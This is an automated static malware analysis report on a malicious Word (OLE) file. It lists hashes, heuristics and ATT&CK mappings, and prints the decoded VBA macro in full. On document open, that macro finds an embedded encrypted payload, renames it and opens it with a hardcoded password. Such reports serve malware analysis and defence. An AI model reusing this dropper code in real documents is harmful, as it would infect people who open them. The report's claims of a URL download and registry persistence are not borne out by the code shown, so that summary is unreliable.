Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 25096f7db07b9b88…

MALICIOUS

Office (OLE)

328.0 KB Created: 2021-09-22 10:46:00 First seen: 2021-10-01
MD5: 1c500101ff04f5d4a0577db3e3ec88df SHA-1: 2b4709982451cb41e6e4fd4c03bb062bd4745027 SHA-256: 25096f7db07b9b887a0c4041642c6665736e1c7b16c64020a99f901774870dac
72 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.005 Visual Basic

The sample contains a VBA macro that is triggered by the Document_Open event. This macro attempts to exploit a vulnerability using an embedded EMF object and also tries to create a registry key for persistence. The macro's logic suggests it's designed to download and execute a secondary payload, although the specific download URL is obfuscated. The presence of the EMF object and the Document_Open macro strongly indicate exploitation for client execution.

Heuristics 5

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/2006/encryption In document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/passwordIn document text (OLE body)
    • http://schemas.microsoft.com/office/2006/keyEncryptor/certificateIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3295 bytes
SHA-256: ab0a07553c2841a74e3ba9d7b1f5c48a5af800dda3fc2f0fa3c0d780a05dba11
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
        Dim hdv As String
        Dim bbbb As String
        Dim med As String
Private Sub Document_Open()
Dim dfgdgdg
Call s1("Lo")



Dim abrakadabra As String
abrakadabra = "o"
Call s2("cal/")
abrakadabra = abrakadabra & "c"
Dim kytrewwf As String
kytrewwf = Options.DefaultFilePath(wdUserTemplatesPath)

If Dir(kytrewwf & "\diplo.d" & abrakadabra) = "" Then
 
    Call bvxfcsd
If Len(hdv) > 2 Then
Call nam(hdv, kytrewwf)
Call pppx(kytrewwf & "\diplo.d" & abrakadabra)




End If
End If
End Sub




Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), hdv)

End Sub



Attribute VB_Name = "Module1"


Sub pppx(spoc As String)
Dim lkvc As String
lkvc = spoc
    Documents.Open FileName:=lkvc, ConfirmConversions:=False, ReadOnly:= _
        False, AddToRecentFiles:=False, PasswordDocument:="2281337", _
        PasswordTemplate:="", Revert:=False, WritePasswordDocument:="", _
        WritePasswordTemplate:="", Format:=wdOpenFormatAuto, XMLTransform:=""
End Sub


Attribute VB_Name = "Module3"
Dim vv1, vv2, vv3, vv4, fafaa As String

Sub s1(vi As String)
vv1 = vi
End Sub
Sub s2(vi As String)
vv2 = vi
End Sub
Sub s3(vi As String)
vv3 = vi
End Sub
Sub bvxfcsd()
vv3 = "Te"
 Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2

    Selection.TypeBackspace

Selection.Copy
Dim uuuuc
uuuuc = Options.DefaultFilePath(wdUserTemplatesPath)

    ntgs = 50
sda = 49


vv4 = "mp"
Dim kuls As String

kuls = vv1 & vv2 & vv3 & vv4


fafaa = kuls
While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(uuuuc, ntgs) & kuls, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(uuuuc, ntgs) & fafaa)
End Sub






Attribute VB_Name = "Module123345"
Dim pls As String


 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
 Dim siplo As String
siplo = "o"
siplo = siplo & "e"
    Dim Ters As Object
  Dim fffff
  fffff = "diplo.i" & siplo
For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc

   For Each Ters In mds.Files
   
   If Ters.Name = fffff Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub



Sub nam(pafs As String, aaaa As String)
Call ousx(aaaa)
Dim abrakadabra As String
abrakadabra = "o"

Dim oxl
oxl = "\diplo.d" & abrakadabra & "c"
Name pafs As pls & oxl
End Sub

Sub uoia(fffs As String)
pls = fffs
End Sub












Sub ousx(aaaa As String)
Call uoia(aaaa)
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1693787468/Ole10Native 160568 bytes
SHA-256: c2ed486a1563a41ad697f56b359c80c8a8dd2d64afef3662263f66543d24d880
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.96, consistent with packed or encrypted content.
ole10native_00_diplo.ioe ole-package-payload OLE Ole10Native payload: ObjectPool/_1693787468/Ole10Native; display_name=diplo.ioe; full_path=C:\Users\MyPc\AppData\Local\Temp\diplo.ioe; temp_path=; def_file= 160256 bytes
SHA-256: 9cdf5ffc3cf543be8ee9bdd2eeabbdca2fee33eaa905f54380d200daf2d5ecbe
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.96, consistent with packed or encrypted content.